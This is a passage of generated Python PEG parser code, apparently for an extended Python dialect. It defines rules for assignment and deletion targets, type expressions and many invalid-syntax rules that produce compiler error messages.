(a := self.star_targets_list_seq(),)
and
(literal_1 := self.expect(']'))
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . List ( elts = a , ctx = Store , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
return None
@memoize
def single_target(self) -> Optional[Any]:
# single_target: single_subscript_attribute_target | NAME | '(' single_target ')'
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(single_subscript_attribute_target := self.single_subscript_attribute_target())
):
return single_subscript_attribute_target
self._reset(mark)
if (
(a := self.name())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Name ( id = a . string , ctx = Store , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(literal := self.expect('('))
and
(a := self.single_target())
and
(literal_1 := self.expect(')'))
):
return a
self._reset(mark)
return None
@memoize
def single_subscript_attribute_target(self) -> Optional[Any]:
# single_subscript_attribute_target: t_primary '.' NAME !t_lookahead | t_primary '[' slices ']' !t_lookahead
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(a := self.t_primary())
and
(literal := self.expect('.'))
and
(b := self.name())
and
self.negative_lookahead(self.t_lookahead, )
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Attribute ( value = a , attr = b . string , ctx = Store , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(a := self.t_primary())
and
(literal := self.expect('['))
and
(b := self.slices())
and
(literal_1 := self.expect(']'))
and
self.negative_lookahead(self.t_lookahead, )
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Subscript ( value = a , slice = b , ctx = Store , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
return None
@memoize_left_rec
def t_primary(self) -> Optional[Any]:
# t_primary: t_primary '.' NAME &t_lookahead | t_primary '[' slices ']' &t_lookahead | t_primary genexp &t_lookahead | t_primary '(' arguments? ')' &t_lookahead | t_primary '(' partial_arguments ')' &t_lookahead | atom &t_lookahead
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(a := self.t_primary())
and
(literal := self.expect('.'))
and
(b := self.name())
and
self.positive_lookahead(self.t_lookahead, )
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Attribute ( value = a , attr = b . string , ctx = Load , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(a := self.t_primary())
and
(literal := self.expect('['))
and
(b := self.slices())
and
(literal_1 := self.expect(']'))
and
self.positive_lookahead(self.t_lookahead, )
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Subscript ( value = a , slice = b , ctx = Load , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(a := self.t_primary())
and
(b := self.genexp())
and
self.positive_lookahead(self.t_lookahead, )
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Call ( func = a , args = [b] , keywords = [] , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(a := self.t_primary())
and
(literal := self.expect('('))
and
(b := self.arguments(),)
and
(literal_1 := self.expect(')'))
and
self.positive_lookahead(self.t_lookahead, )
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Call ( func = a , args = b [0] if b else [] , keywords = b [1] if b else [] , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset , )
self._reset(mark)
if (
(a := self.t_primary())
and
(literal := self.expect('('))
and
(b := self.partial_arguments())
and
(literal_1 := self.expect(')'))
and
self.positive_lookahead(self.t_lookahead, )
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return self . make_partial_function ( a , b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(a := self.atom())
and
self.positive_lookahead(self.t_lookahead, )
):
return a
self._reset(mark)
return None
@memoize
def t_lookahead(self) -> Optional[Any]:
# t_lookahead: '(' | '[' | '.'
mark = self._mark()
if (
(literal := self.expect('('))
):
return literal
self._reset(mark)
if (
(literal := self.expect('['))
):
return literal
self._reset(mark)
if (
(literal := self.expect('.'))
):
return literal
self._reset(mark)
return None
@memoize
def del_targets(self) -> Optional[Any]:
# del_targets: ','.del_target+ ','?
mark = self._mark()
if (
(a := self._gather_149())
and
(opt := self.expect(','),)
):
return a
self._reset(mark)
return None
@memoize
def del_target(self) -> Optional[Any]:
# del_target: t_primary '.' NAME !t_lookahead | t_primary '[' slices ']' !t_lookahead | del_t_atom
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(a := self.t_primary())
and
(literal := self.expect('.'))
and
(b := self.name())
and
self.negative_lookahead(self.t_lookahead, )
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Attribute ( value = a , attr = b . string , ctx = Del , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(a := self.t_primary())
and
(literal := self.expect('['))
and
(b := self.slices())
and
(literal_1 := self.expect(']'))
and
self.negative_lookahead(self.t_lookahead, )
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Subscript ( value = a , slice = b , ctx = Del , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(del_t_atom := self.del_t_atom())
):
return del_t_atom
self._reset(mark)
return None
@memoize
def del_t_atom(self) -> Optional[Any]:
# del_t_atom: NAME | '(' del_target ')' | '(' del_targets? ')' | '[' del_targets? ']'
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(a := self.name())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Name ( id = a . string , ctx = Del , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(literal := self.expect('('))
and
(a := self.del_target())
and
(literal_1 := self.expect(')'))
):
return self . set_expr_context ( a , Del )
self._reset(mark)
if (
(literal := self.expect('('))
and
(a := self.del_targets(),)
and
(literal_1 := self.expect(')'))
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Tuple ( elts = a , ctx = Del , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(literal := self.expect('['))
and
(a := self.del_targets(),)
and
(literal_1 := self.expect(']'))
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . List ( elts = a , ctx = Del , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
return None
@memoize
def type_expressions(self) -> Optional[list]:
# type_expressions: ','.expression+ ',' '*' expression ',' '**' expression | ','.expression+ ',' '*' expression | ','.expression+ ',' '**' expression | '*' expression ',' '**' expression | '*' expression | '**' expression | ','.expression+
mark = self._mark()
if (
(a := self._gather_151())
and
(literal := self.expect(','))
and
(literal_1 := self.expect('*'))
and
(b := self.expression())
and
(literal_2 := self.expect(','))
and
(literal_3 := self.expect('**'))
and
(c := self.expression())
):
return a + [b , c]
self._reset(mark)
if (
(a := self._gather_153())
and
(literal := self.expect(','))
and
(literal_1 := self.expect('*'))
and
(b := self.expression())
):
return a + [b]
self._reset(mark)
if (
(a := self._gather_155())
and
(literal := self.expect(','))
and
(literal_1 := self.expect('**'))
and
(b := self.expression())
):
return a + [b]
self._reset(mark)
if (
(literal := self.expect('*'))
and
(a := self.expression())
and
(literal_1 := self.expect(','))
and
(literal_2 := self.expect('**'))
and
(b := self.expression())
):
return [a , b]
self._reset(mark)
if (
(literal := self.expect('*'))
and
(a := self.expression())
):
return [a]
self._reset(mark)
if (
(literal := self.expect('**'))
and
(a := self.expression())
):
return [a]
self._reset(mark)
if (
(a := self._gather_157())
):
return a
self._reset(mark)
return None
@memoize
def func_type_comment(self) -> Optional[Any]:
# func_type_comment: NEWLINE TYPE_COMMENT &(NEWLINE INDENT) | invalid_double_type_comments | TYPE_COMMENT
mark = self._mark()
if (
(_newline := self.expect('NEWLINE'))
and
(t := self.type_comment())
and
self.positive_lookahead(self._tmp_159, )
):
return t . string
self._reset(mark)
if (
(invalid_double_type_comments := self.invalid_double_type_comments())
):
return None # pragma: no cover
self._reset(mark)
if (
(type_comment := self.type_comment())
):
return type_comment
self._reset(mark)
return None
@memoize
def invalid_arguments(self) -> Optional[NoReturn]:
# invalid_arguments: args ',' '*' | expression for_if_clauses ',' [args | expression for_if_clauses] | NAME '=' expression for_if_clauses | args for_if_clauses | args ',' expression for_if_clauses | args ',' args
mark = self._mark()
if (
(a := self.args())
and
(literal := self.expect(','))
and
(literal_1 := self.expect('*'))
):
return self . store_syntax_error_known_location ( "iterable argument unpacking follows keyword argument unpacking" , a [1] [- 1] if a [1] else a [0] [- 1] , )
self._reset(mark)
if (
(a := self.expression())
and
(b := self.for_if_clauses())
and
(literal := self.expect(','))
and
(opt := self._tmp_160(),)
):
return self . store_syntax_error_known_range ( "Generator expression must be parenthesized" , a , b [- 1] . target )
self._reset(mark)
if (
(a := self.name())
and
(b := self.expect('='))
and
(expression := self.expression())
and
(for_if_clauses := self.for_if_clauses())
):
return self . store_syntax_error_known_range ( "invalid syntax. Maybe you meant '==' or ':=' instead of '='?" , a , b )
self._reset(mark)
if (
(a := self.args())
and
(for_if_clauses := self.for_if_clauses())
):
return self . store_syntax_error_starting_from ( "Generator expression must be parenthesized" , a [1] [- 1] if a [1] else a [0] [- 1] )
self._reset(mark)
if (
(args := self.args())
and
(literal := self.expect(','))
and
(a := self.expression())
and
(b := self.for_if_clauses())
):
return self . store_syntax_error_known_range ( "Generator expression must be parenthesized" , a , b [- 1] . target , )
self._reset(mark)
if (
(a := self.args())
and
(literal := self.expect(','))
and
(args := self.args())
):
return self . store_syntax_error ( "positional argument follows keyword argument unpacking" if a [1] [- 1] . arg is None else "positional argument follows keyword argument" , )
self._reset(mark)
return None
@memoize
def invalid_kwarg(self) -> Optional[NoReturn]:
# invalid_kwarg: NAME '=' expression for_if_clauses | !(NAME '=') expression '='
mark = self._mark()
if (
(a := self.name())
and
(b := self.expect('='))
and
(expression := self.expression())
and
(for_if_clauses := self.for_if_clauses())
):
return self . store_syntax_error_known_range ( "invalid syntax. Maybe you meant '==' or ':=' instead of '='?" , a , b )
self._reset(mark)
if (
self.negative_lookahead(self._tmp_161, )
and
(a := self.expression())
and
(b := self.expect('='))
):
return self . store_syntax_error_known_range ( "expression cannot contain assignment, perhaps you meant \"==\"?" , a , b , )
self._reset(mark)
return None
@memoize
def expression_without_invalid(self) -> Optional[ast . AST]:
# expression_without_invalid: disjunction 'if' disjunction 'else' expression | disjunction '?' disjunction ':' expression | disjunction | lambdef
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(a := self.disjunction())
and
(literal := self.expect('if'))
and
(b := self.disjunction())
and
(literal_1 := self.expect('else'))
and
(c := self.expression())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . IfExp ( body = b , test = a , orelse = c , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(b := self.disjunction())
and
(literal := self.expect('?'))
and
(a := self.disjunction())
and
(literal_1 := self.expect(':'))
and
(c := self.expression())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . IfExp ( body = a , test = b , orelse = c , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(disjunction := self.disjunction())
):
return disjunction
self._reset(mark)
if (
(lambdef := self.lambdef())
):
return lambdef
self._reset(mark)
return None
@memoize
def invalid_legacy_expression(self) -> Optional[Any]:
# invalid_legacy_expression: NAME !'(' expression_without_invalid
mark = self._mark()
if (
(a := self.name())
and
self.negative_lookahead(self.expect, '(')
and
(b := self.expression_without_invalid())
):
return self . raise_syntax_error_known_range ( f"Missing parentheses in call to '{a.string}' . Did you mean {a.string}(...)?" , a , b , ) if a . string in ( "exec" , "print" ) else None
self._reset(mark)
return None
@memoize
def invalid_expression(self) -> Optional[NoReturn]:
# invalid_expression: invalid_legacy_expression | !(NAME STRING | SOFT_KEYWORD) disjunction expression_without_invalid | disjunction 'if' disjunction !('else' | ':') | disjunction '?' !'?' disjunction !':'
mark = self._mark()
if (
(invalid_legacy_expression := self.invalid_legacy_expression())
):
return None # pragma: no cover
self._reset(mark)
if (
self.negative_lookahead(self._tmp_162, )
and
(a := self.disjunction())
and
(b := self.expression_without_invalid())
):
return self . store_syntax_error_known_range ( "invalid syntax. Perhaps you forgot a comma?" , a , b )
self._reset(mark)
if (
(a := self.disjunction())
and
(literal := self.expect('if'))
and
(b := self.disjunction())
and
self.negative_lookahead(self._tmp_163, )
):
return self . store_syntax_error_known_range ( "expected 'else' after 'if' expression" , a , b )
self._reset(mark)
if (
(b := self.disjunction())
and
(literal := self.expect('?'))
and
self.negative_lookahead(self.expect, '?')
and
(a := self.disjunction())
and
self.negative_lookahead(self.expect, ':')
):
return self . store_syntax_error_known_range ( "expected ':' after '?' expression" , b , a )
self._reset(mark)
return None
@memoize
def invalid_named_expression(self) -> Optional[NoReturn]:
# invalid_named_expression: expression ':=' expression | NAME '=' bitwise_or !('=' | ':=') | !(list | tuple | genexp | 'True' | 'None' | 'False') bitwise_or '=' bitwise_or !('=' | ':=')
mark = self._mark()
if (
(a := self.expression())
and
(literal := self.expect(':='))
and
(expression := self.expression())
):
return self . store_syntax_error_known_location ( f"cannot use assignment expressions with {self.get_expr_name(a)}" , a )
self._reset(mark)
if (
(a := self.name())
and
(literal := self.expect('='))
and
(b := self.bitwise_or())
and
self.negative_lookahead(self._tmp_164, )
):
return ( None if self . in_recursive_rule else self . store_syntax_error_known_range ( "invalid syntax. Maybe you meant '==' or ':=' instead of '='?" , a , b ) )
self._reset(mark)
if (
self.negative_lookahead(self._tmp_165, )
and
(a := self.bitwise_or())
and
(b := self.expect('='))
and
(bitwise_or := self.bitwise_or())
and
self.negative_lookahead(self._tmp_166, )
):
return ( None if self . in_recursive_rule else self . store_syntax_error_known_range ( f"cannot assign to {self.get_expr_name(a)} here. Maybe you meant '==' instead of '='?" , a , b ) )
self._reset(mark)
return None
@memoize
def invalid_assignment(self) -> Optional[NoReturn]:
# invalid_assignment: invalid_ann_assign_target ':' expression | star_named_expression ',' star_named_expressions* ':' expression | expression ':' expression | ((star_targets '='))* star_expressions '=' | ((star_targets '='))* yield_expr '=' | star_expressions augassign (yield_expr | star_expressions)
mark = self._mark()
if (
(a := self.invalid_ann_assign_target())
and
(literal := self.expect(':'))
and
(expression := self.expression())
):
return self . store_syntax_error_known_location ( f"only single target (not {self.get_expr_name(a)}) can be annotated" , a )
self._reset(mark)
if (
(a := self.star_named_expression())
and
(literal := self.expect(','))
and
(_loop0_167 := self._loop0_167(),)
and
(literal_1 := self.expect(':'))
and
(expression := self.expression())
):
return self . store_syntax_error_known_location ( "only single target (not tuple) can be annotated" , a )
self._reset(mark)
if (
(a := self.expression())
and
(literal := self.expect(':'))
and
(expression := self.expression())
):
return self . store_syntax_error_known_location ( "illegal target for annotation" , a )
self._reset(mark)
if (
(_loop0_168 := self._loop0_168(),)
and
(a := self.star_expressions())
and
(literal := self.expect('='))
):
return self . store_syntax_error_known_location ( f"cannot assign to {self.get_expr_name(a)}" , a )
self._reset(mark)
if (
(_loop0_169 := self._loop0_169(),)
and
(a := self.yield_expr())
and
(literal := self.expect('='))
):
return self . store_syntax_error_known_location ( "assignment to yield expression not possible" , a )
self._reset(mark)
if (
(a := self.star_expressions())
and
(augassign := self.augassign())
and
(_tmp_170 := self._tmp_170())
):
return self . store_syntax_error_known_location ( f"{self.get_expr_name(a)} is an illegal expression for augmented assignment" , a )
self._reset(mark)
return None
@memoize
def invalid_ann_assign_target(self) -> Optional[ast . AST]:
# invalid_ann_assign_target: list | tuple | '(' invalid_ann_assign_target ')'
mark = self._mark()
if (
(a := self.list())
):
return a
self._reset(mark)
if (
(a := self.tuple())
):
return a
self._reset(mark)
if (
(literal := self.expect('('))
and
(a := self.invalid_ann_assign_target())
and
(literal_1 := self.expect(')'))
):
return a
self._reset(mark)
return None
@memoize
def invalid_del_stmt(self) -> Optional[NoReturn]:
# invalid_del_stmt: 'del' star_expressions
mark = self._mark()
if (
(literal := self.expect('del'))
and
(a := self.star_expressions())
):
return self . raise_syntax_error_known_location ( f"cannot delete {self.get_expr_name(a)}" , a )
self._reset(mark)
return None
@memoize
def invalid_block(self) -> Optional[NoReturn]:
# invalid_block: NEWLINE !INDENT
mark = self._mark()
if (
(_newline := self.expect('NEWLINE'))
and
self.negative_lookahead(self.expect, 'INDENT')
):
return self . raise_indentation_error ( "expected an indented block" )
self._reset(mark)
return None
@memoize
def invalid_comprehension(self) -> Optional[NoReturn]:
# invalid_comprehension: ('[' | '(' | '{') starred_expression for_if_clauses | ('[' | '{') star_named_expression ',' star_named_expressions for_if_clauses | ('[' | '{') star_named_expression ',' for_if_clauses
mark = self._mark()
if (
(_tmp_171 := self._tmp_171())
and
(a := self.starred_expression())
and
(for_if_clauses := self.for_if_clauses())
):
return self . raise_syntax_error_known_location ( "iterable unpacking cannot be used in comprehension" , a )
self._reset(mark)
if (
(_tmp_172 := self._tmp_172())
and
(a := self.star_named_expression())
and
(literal := self.expect(','))
and
(b := self.star_named_expressions())
and
(for_if_clauses := self.for_if_clauses())
):
return self . raise_syntax_error_known_range ( "did you forget parentheses around the comprehension target?" , a , b [- 1] )
self._reset(mark)
if (
(_tmp_173 := self._tmp_173())
and
(a := self.star_named_expression())
and
(b := self.expect(','))
and
(for_if_clauses := self.for_if_clauses())
):
return self . raise_syntax_error_known_range ( "did you forget parentheses around the comprehension target?" , a , b )
self._reset(mark)
return None
@memoize
def invalid_dict_comprehension(self) -> Optional[NoReturn]:
# invalid_dict_comprehension: '{' '**' bitwise_or for_if_clauses '}'
mark = self._mark()
if (
(literal := self.expect('{'))
and
(a := self.expect('**'))
and
(bitwise_or := self.bitwise_or())
and
(for_if_clauses := self.for_if_clauses())
and
(literal_1 := self.expect('}'))
):
return self . raise_syntax_error_known_location ( "dict unpacking cannot be used in dict comprehension" , a )
self._reset(mark)
return None
@memoize
def invalid_parameters(self) -> Optional[NoReturn]:
# invalid_parameters: param_no_default* invalid_parameters_helper param_no_default
mark = self._mark()
if (
(_loop0_174 := self._loop0_174(),)
and
(invalid_parameters_helper := self.invalid_parameters_helper())
and
(a := self.param_no_default())
):
return self . raise_syntax_error_known_location ( "non-default argument follows default argument" , a )
self._reset(mark)
return None
@memoize
def invalid_parameters_helper(self) -> Optional[Any]:
# invalid_parameters_helper: slash_with_default | param_with_default+
mark = self._mark()
if (
(a := self.slash_with_default())
):
return [a]
self._reset(mark)
if (
(a := self._loop1_175())
):
return a
self._reset(mark)
return None
@memoize
def invalid_lambda_parameters(self) -> Optional[NoReturn]:
# invalid_lambda_parameters: lambda_param_no_default* invalid_lambda_parameters_helper lambda_param_no_default
mark = self._mark()
if (
(_loop0_176 := self._loop0_176(),)
and
(invalid_lambda_parameters_helper := self.invalid_lambda_parameters_helper())
and
(a := self.lambda_param_no_default())
):
return self . raise_syntax_error_known_location ( "non-default argument follows default argument" , a )
self._reset(mark)
return None
@memoize
def invalid_lambda_parameters_helper(self) -> Optional[NoReturn]:
# invalid_lambda_parameters_helper: lambda_slash_with_default | lambda_param_with_default+
mark = self._mark()
if (
(a := self.lambda_slash_with_default())
):
return [a]
self._reset(mark)
if (
(a := self._loop1_177())
):
return a
self._reset(mark)
return None
@memoize
def invalid_star_etc(self) -> Optional[NoReturn]:
# invalid_star_etc: '*' (')' | ',' (')' | '**')) | '*' ',' TYPE_COMMENT
mark = self._mark()
if (
(a := self.expect('*'))
and
(_tmp_178 := self._tmp_178())
):
return self . store_syntax_error_known_location ( "named arguments must follow bare *" , a )
self._reset(mark)
if (
(literal := self.expect('*'))
and
(literal_1 := self.expect(','))
and
(type_comment := self.type_comment())
):
return self . store_syntax_error ( "bare * has associated type comment" )
self._reset(mark)
return None
@memoize
def invalid_lambda_star_etc(self) -> Optional[NoReturn]:
# invalid_lambda_star_etc: '*' (':' | ',' (':' | '**'))
mark = self._mark()
if (
(literal := self.expect('*'))
and
(_tmp_179 := self._tmp_179())
):
return self . raise_syntax_error ( "named arguments must follow bare *" )
self._reset(mark)
return None
@memoize
def invalid_double_type_comments(self) -> Optional[NoReturn]:
# invalid_double_type_comments: TYPE_COMMENT NEWLINE TYPE_COMMENT NEWLINE INDENT
mark = self._mark()
if (
(type_comment := self.type_comment())
and
(_newline := self.expect('NEWLINE'))
and
(type_comment_1 := self.type_comment())
and
(_newline_1 := self.expect('NEWLINE'))
and
(_indent := self.expect('INDENT'))
):
return self . raise_syntax_error ( "Cannot have two type comments on def" )
self._reset(mark)
return None
@memoize
def invalid_with_item(self) -> Optional[NoReturn]:
# invalid_with_item: expression 'as' expression &(',' | ')' | ':')
mark = self._mark()
if (
(expression := self.expression())
and
(literal := self.expect('as'))
and
(a := self.expression())
and
self.positive_lookahead(self._tmp_180, )
):
return self . raise_syntax_error_known_location ( f"cannot assign to {self.get_expr_name(a)}" , a )
self._reset(mark)
return None
@memoize
def invalid_for_target(self) -> Optional[NoReturn]:
# invalid_for_target: 'async'? 'for' star_expressions
mark = self._mark()
if (
(opt := self.expect('async'),)
and
(literal := self.expect('for'))
and
(a := self.star_expressions())
):
return self . raise_syntax_error_known_location ( f"cannot assign to {self.get_expr_name(a)}" , a )
self._reset(mark)
return None
@memoize
def invalid_group(self) -> Optional[NoReturn]:
# invalid_group: '(' starred_expression ')' | '(' '**' expression ')'
mark = self._mark()
if (
(literal := self.expect('('))
and
(a := self.starred_expression())
and
(literal_1 := self.expect(')'))
):
return self . raise_syntax_error_known_location ( "cannot use starred expression here" , a )
self._reset(mark)
if (
(literal := self.expect('('))
and
(a := self.expect('**'))
and
(expression := self.expression())
and
(literal_1 := self.expect(')'))
):
return self . raise_syntax_error_known_location ( "cannot use double starred expression here" , a )
self._reset(mark)
return None
@memoize
def invalid_import_from_targets(self) -> Optional[NoReturn]:
# invalid_import_from_targets: import_from_as_names ',' NEWLINE
mark = self._mark()
if (
(import_from_as_names := self.import_from_as_names())
and
(literal := self.expect(','))
and
(_newline := self.expect('NEWLINE'))
):
return self . raise_syntax_error ( "trailing comma not allowed without surrounding parentheses" )
self._reset(mark)
return None
@memoize
def invalid_with_stmt(self) -> Optional[None]:
# invalid_with_stmt: 'async'? 'with' ','.(expression ['as' star_target])+ &&':' | 'async'? 'with' '(' ','.(expressions ['as' star_target])+ ','? ')' &&':'
mark = self._mark()
if (
(opt := self.expect('async'),)
and
(literal := self.expect('with'))
and
(_gather_181 := self._gather_181())
and
(forced := self.expect_forced(self.expect(':'), "':'"))
):
return None # pragma: no cover
self._reset(mark)
if (
(opt := self.expect('async'),)
and
(literal := self.expect('with'))
and
(literal_1 := self.expect('('))
and
(_gather_183 := self._gather_183())
and
(opt_1 := self.expect(','),)
and
(literal_2 := self.expect(')'))
and
(forced := self.expect_forced(self.expect(':'), "':'"))
):
return None # pragma: no cover
self._reset(mark)
return None
@memoize
def invalid_with_stmt_indent(self) -> Optional[NoReturn]:
# invalid_with_stmt_indent: 'async'? 'with' ','.(expression ['as' star_target])+ ':' NEWLINE !INDENT | 'async'? 'with' '(' ','.(expressions ['as' star_target])+ ','? ')' ':' NEWLINE !INDENT
mark = self._mark()
if (
(opt := self.expect('async'),)
and
(a := self.expect('with'))
and
(_gather_185 := self._gather_185())
and
(literal := self.expect(':'))
and
(_newline := self.expect('NEWLINE'))
and
self.negative_lookahead(self.expect, 'INDENT')
):
return self . raise_indentation_error ( f"expected an indented block after 'with' statement on line {a.start[0]}" )
self._reset(mark)
if (
(opt := self.expect('async'),)
and
(a := self.expect('with'))
and
(literal := self.expect('('))
and
(_gather_187 := self._gather_187())
and
(opt_1 := self.expect(','),)
and
(literal_1 := self.expect(')'))
and
(literal_2 := self.expect(':'))
and
(_newline := self.expect('NEWLINE'))
and
self.negative_lookahead(self.expect, 'INDENT')
):
return self . raise_indentation_error ( f"expected an indented block after 'with' statement on line {a.start[0]}" )
self._reset(mark)
return None
@memoize
def invalid_try_stmt(self) -> Optional[NoReturn]:
# invalid_try_stmt: 'try' ':' NEWLINE !INDENT | 'try' ':' block !('except' | 'finally')
mark = self._mark()
if (
(a := self.expect('try'))
and
(literal := self.expect(':'))
and
(_newline := self.expect('NEWLINE'))
and
self.negative_lookahead(self.expect, 'INDENT')
):
return self . raise_indentation_error ( f"expected an indented block after 'try' statement on line {a.start[0]}" , )
self._reset(mark)
if (
(literal := self.expect('try'))
and
(literal_1 := self.expect(':'))
and
(block := self.block())
and
self.negative_lookahead(self._tmp_189, )
):
return self . raise_syntax_error ( "expected 'except' or 'finally' block" )
self._reset(mark)
return None
@memoize
def invalid_except_stmt(self) -> Optional[None]:
# invalid_except_stmt: 'except' expression ',' expressions ['as' NAME] ':' | 'except' expression ['as' NAME] NEWLINE | 'except' NEWLINE
mark = self._mark()
if (
(literal := self.expect('except'))
and
(a := self.expression())
and
(literal_1 := self.expect(','))
and
(expressions := self.expressions())
and
(opt := self._tmp_190(),)
and
(literal_2 := self.expect(':'))
):
return self . raise_syntax_error_starting_from ( "exception group must be parenthesized" , a )
self._reset(mark)
if (
(a := self.expect('except'))
and
(expression := self.expression())
and
(opt := self._tmp_191(),)
and
(_newline := self.expect('NEWLINE'))
):
return self . store_syntax_error ( "expected ':'" )
self._reset(mark)
if (
(a := self.expect('except'))
and
(_newline := self.expect('NEWLINE'))
):
return self . store_syntax_error ( "expected ':'" )
self._reset(mark)
return None
@memoize
def invalid_finally_stmt(self) -> Optional[NoReturn]:
# invalid_finally_stmt: 'finally' ':' NEWLINE !INDENT
mark = self._mark()
if (
(a := self.expect('finally'))
and
(literal := self.expect(':'))
and
(_newline := self.expect('NEWLINE'))
and
self.negative_lookahead(self.expect, 'INDENT')
):
return self . raise_indentation_error ( f"expected an indented block after 'finally' statement on line {a.start[0]}" )
self._reset(mark)
return None
@memoize
def invalid_except_stmt_indent(self) -> Optional[NoReturn]:
# invalid_except_stmt_indent: 'except' expression ['as' NAME] ':' NEWLINE !INDENT | 'except' ':' NEWLINE !INDENT
mark = self._mark()
if (
(a := self.expect('except'))
and
(expression := self.expression())
and
(opt := self._tmp_192(),)
and
(literal := self.expect(':'))
and
(_newline := self.expect('NEWLINE'))
and
self.negative_lookahead(self.expect, 'INDENT')
):
return self . raise_indentation_error ( f"expected an indented block after 'except' statement on line {a.start[0]}" )
self._reset(mark)
if (
(a := self.expect('except'))
and
(literal := self.expect(':'))
and
(_newline := self.expect('NEWLINE'))
and
self.negative_lookahead(self.expect, 'INDENT')
):
return self . raise_indentation_error ( f"expected an indented block after 'except' statement on line {a.start[0]}" )
self._reset(mark)
return None
@memoize
def invalid_match_stmt(self) -> Optional[NoReturn]:
# invalid_match_stmt: "match" subject_expr !':' | "match" subject_expr ':' NEWLINE !INDENT
mark = self._mark()
if (
(literal := self.expect("match"))
and
(subject_expr := self.subject_expr())
and
self.negative_lookahead(self.expect, ':')
):
return self . check_version ( ( 3 , 10 ) , "Pattern matching is" , self . raise_syntax_error ( "expected ':'" ) )
self._reset(mark)
if (
(a := self.expect("match"))
and
(subject := self.subject_expr())
and
(literal := self.expect(':'))
and
(_newline := self.expect('NEWLINE'))
and
self.negative_lookahead(self.expect, 'INDENT')
):
return self . check_version ( ( 3 , 10 ) , "Pattern matching is" , self . raise_indentation_error ( f"expected an indented block after 'match' statement on line {a.start[0]}" ) )
self._reset(mark)
return None
@memoize
def invalid_case_block(self) -> Optional[NoReturn]:
# invalid_case_block: "case" patterns guard? !':' | "case" patterns guard? ':' NEWLINE !INDENT
mark = self._mark()
if (
(literal := self.expect("case"))
and
(patterns := self.patterns())
and
(opt := self.guard(),)
and
self.negative_lookahead(self.expect, ':')
):
return self . store_syntax_error ( "expected ':'" )
self._reset(mark)
if (
(a := self.expect("case"))
and
(patterns := self.patterns())
and
(opt := self.guard(),)
and
(literal := self.expect(':'))
and
(_newline := self.expect('NEWLINE'))
and
self.negative_lookahead(self.expect, 'INDENT')
):
return self . raise_indentation_error ( f"expected an indented block after 'case' statement on line {a.start[0]}" )
self._reset(mark)
return None
@memoize
def invalid_as_pattern(self) -> Optional[NoReturn]:
# invalid_as_pattern: or_pattern 'as' "_" | or_pattern 'as' !NAME expression
mark = self._mark()
if (
(or_pattern := self.or_pattern())
and
(literal := self.expect('as'))
and
(a := self.expect("_"))
):
return self . raise_syntax_error_known_location ( "cannot use '_' as a target" , a )
self._reset(mark)
if (
(or_pattern := self.or_pattern())
and
(literal := self.expect('as'))
and
self.negative_lookahead(self.name, )
and
(a := self.expression())
):
return self . raise_syntax_error_known_location ( "invalid pattern target" , a )
self._reset(mark)
return None
@memoize
